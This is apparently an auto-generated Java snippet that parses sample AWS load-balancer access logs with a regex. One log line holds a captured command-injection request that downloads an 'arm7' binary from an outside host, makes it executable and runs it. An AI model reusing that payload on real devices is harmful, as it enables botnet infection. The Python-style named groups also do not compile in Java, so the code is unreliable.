import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class Example {
public static void main(String[] args) {
final String regex = "^(?P<alb_type>(https?|h2|wss?))\\s*(?P<alb_timestamp>[^\\s]+)\\s*(?P<alb_elb>[^\\s]+)\\s*(?P<alb_client_addr>[^:]+):\\s*(?P<alb_client_port>[^\\s]+)\\s*(?P<alb_target_addr>-)\\s*(?P<alb_request_processing_time>[^\\s]+)\\s*(?P<alb_target_processing_time>[^\\s]+)\\s*(?P<alb_response_processing_time>[^\\s]+)\\s*(?P<alb_elb_status_code>[^\\s]+)\\s*(?P<alb_target_status_code>[^\\s]+)\\s*(?P<alb_received_bytes>[^\\s]+)\\s*(?P<alb_sent_bytes>[^\\s]+)\\s*\"(?P<alb_request>.*?)\"\\s+\"(?P<alb_user_agent>[^\\\"]+)\"\\s*(?P<alb_ssl_cipher>[^\\s]+)\\s*(?P<alb_ssl_protocol>[^\\s]+)\\s*(?P<alb_target_group_arn>[^\\s]+)\\s*\"(?P<alb_trace_id>[^\\\"]+)\"\\s*\"(?P<alb_domain_name>[a-zA-Z0-9\\.\\-:]+)\"\\s*\"(?P<alb_chosen_cert_arn>[^\\\"]+)\"\\s*(?P<alb_matched_rule_priority>[^\\s]+)\\s*(?P<alb_request_creation_time>[^\\s]+)\\s*\\s*\"(?P<alb_actions_executed>[^\\s]+)\"\\s*\"(?P<alb_redirect_url>[^\\s]+)\"\\s*\"(?P<alb_error_reason>[^\\\"]+)\"\\s*\"?(?P<alb_target_port_list>[0-9 :\\.-]+)\"?\\s*\"?(?P<alb_target_status_code_list>[0-9 -]+)\"?";
final String string = "https 2020-04-16T22:12:33.005975Z app/4da01abcd-prod-mer-c3e3/5b28cd8a0000e9ade 12.20.0.124:40802 - -1 -1 -1 400 - 163 288 \"POST http://4da14ddd-prod-mergedextern-c3e3-212123456.us-east-1.elb.amazonaws.com:80/form/admin/formPin HTTP/1.1\" \"polaris botnet\" - - - \"-\" \"-\" \"-\" - 2020-04-16T22:12:33.005000Z \"-\" \"-\" \"-\" \"-\" \"-\"\n\n"
+ "http 2020-04-16T22:58:45.017441Z app/4da14ddd-prod-mer-c3e3/7f28ba8e991e9ade 89.12.16.13:52263 - -1 -1 -1 400 - 266 288 \"POST http://3ca14abc-prod-mer-c3e3-2129123456.us-east-1.elb.amazonaws.com:80/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh$\"cd${IF}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IF}busybox${IFS}cget${IFS}http://19ce0f.grok.im/arm7;${IFS}chmod${IFS}77${IFS}arm7;${IFS}./arm7\"%0A%2&logUser=a&loginPwd=a HTTP/1.1\" \"-\" - - - \"-\" \"-\" \"-\" - 2020-04-16T22:58:45.017000Z \"-\" \"-\" \"-\" \"-\" \"-\"\n\n"
+ "https 2020-04-17T00:03:31.610273Z app/4da10abc-prod-mer-c3e3/7f28ba8e881e0ade 74.7.15.100:33766 - -1 -1 -1 400 - 0 0 \"- https://4da14eee-prod-mer-c3e3-2129577269.us-east-1.elb.amazonaws.com:443- -\" \"-\" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - \"-\" \"-\" \"arn:aws:acm:us-east-1:57257000000:certificate/ae07b666-1ee3-4b79-bde5-022ddee00a21\" - 2020-04-17T00:03:31.610000Z \"-\" \"-\" \"-\" \"-\" \"-\"\n\n"
+ "https 2020-04-17T00:03:30.285233Z app/4da1eeee-prod-mer-c0a0/7f28ba8e000e9adf 604.2.14.6:33547 - -1 -1 -1 400 - 0 0 \"- https://4da14ddd-prod-mergedextern-c3e3-2129123456.us-east-1.elb.amazonaws.com:443- -\" \"-\" ECDHE-RSA-AES128-SHA TLSv1 - \"-\" \"-\" \"arn:aws:acm:us-east-1:572571234567:certificate/ae07b36f-1463-4b79-bdc5-922ddee87a31\" - 2020-04-17T00:03:30.285000Z \"-\" \"-\" \"-\" \"-\" \"-\"\n\n"
+ "https 2020-04-17T00:05:41.560192Z app/4da00eee-prod-mer-c3e3/7f28ba8e991e9ade 209.17.96.66:54201 - -1 -1 -1 404 - 139 167 \"GET https://34.202.223.200:443/ HTTP/1.1\" \"Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)\" ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 - \"Root=1-5e98d123c-ea7e5a803e7abcab79cb0772\" \"3.102.123.345:443\" \"arn:aws:acm:us-east-1:572512345678:certificate/ae07a00c-1426-4b00-bdc5-123abce87a31\" 0 2020-04-17T00:05:41.560000Z \"fixed-response\" \"-\" \"-\" \"-\" \"-\"\n";
final Pattern pattern = Pattern.compile(regex, Pattern.MULTILINE);
final Matcher matcher = pattern.matcher(string);
while (matcher.find()) {
System.out.println("Full match: " + matcher.group(0));
for (int i = 1; i <= matcher.groupCount(); i++) {
System.out.println("Group " + i + ": " + matcher.group(i));
}
}
}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Java, please visit: https://docs.oracle.com/javase/7/docs/api/java/util/regex/Pattern.html